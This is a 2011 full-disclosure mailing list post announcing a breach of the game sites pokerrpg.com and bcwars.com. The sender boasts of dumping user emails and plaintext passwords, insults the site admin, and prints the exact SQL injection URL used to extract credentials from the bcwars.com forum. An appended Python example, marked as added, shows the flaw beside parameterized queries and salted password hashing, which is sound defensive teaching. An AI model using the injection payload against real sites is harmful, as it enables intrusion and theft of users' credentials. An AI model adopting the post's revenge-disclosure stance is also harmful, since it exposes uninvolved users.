Date: Wed, 30 Mar 2011 22:29:30 +0000
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: bcwars.com & pokerrpg.com hacked 200k Email and
	Plain text passwords

Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

injection was
http://bcwars.com/forum/category/-3' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

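An added example, not part of the original post or of either site's code: the two weaknesses the message names (a forum category value reaching SQL unparameterized, and plaintext password storage) shown beside their fixes. The schema, function names and scrypt parameters are assumptions, and the sample row is constructed.

```python
import hashlib, hmac, os, sqlite3

def make_db():
    # Constructed in-memory schema; table and column names are illustrative.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categories (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT,
                            salt BLOB, pw_hash BLOB);
        INSERT INTO categories VALUES (1, 'General');
    """)
    return db

def hash_password(password, salt):
    # Salted, memory-hard KDF from the standard library (parameters assumed).
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)

def add_user(db, username, email, password):
    salt = os.urandom(16)  # per-user random salt; the password is never stored
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               (username, email, salt, hash_password(password, salt)))

def check_password(db, username, password):
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], hash_password(password, row[0]))

def category_unsafe(db, raw_id):
    # Flawed pattern: the URL path segment is pasted into the statement text.
    sql = "SELECT title FROM categories WHERE id = '" + raw_id + "'"
    return [r[0] for r in db.execute(sql)]

def category_safe(db, raw_id):
    # Reject anything that is not an integer, then bind it as a parameter.
    try:
        cat_id = int(raw_id)
    except ValueError:
        return []
    rows = db.execute("SELECT title FROM categories WHERE id = ?", (cat_id,))
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    add_user(db, "alice", "alice@example.test", "correct horse")  # constructed
    probe = "-3' union select username || '::' || email from users-- -"
    print(category_unsafe(db, probe))  # user data returned by a category lookup
    print(category_safe(db, probe))    # rejected before it reaches the database
```

With salted scrypt hashes in place of plaintext, a query flaw like the one above would expose hashes that must be cracked one by one rather than directly usable passwords.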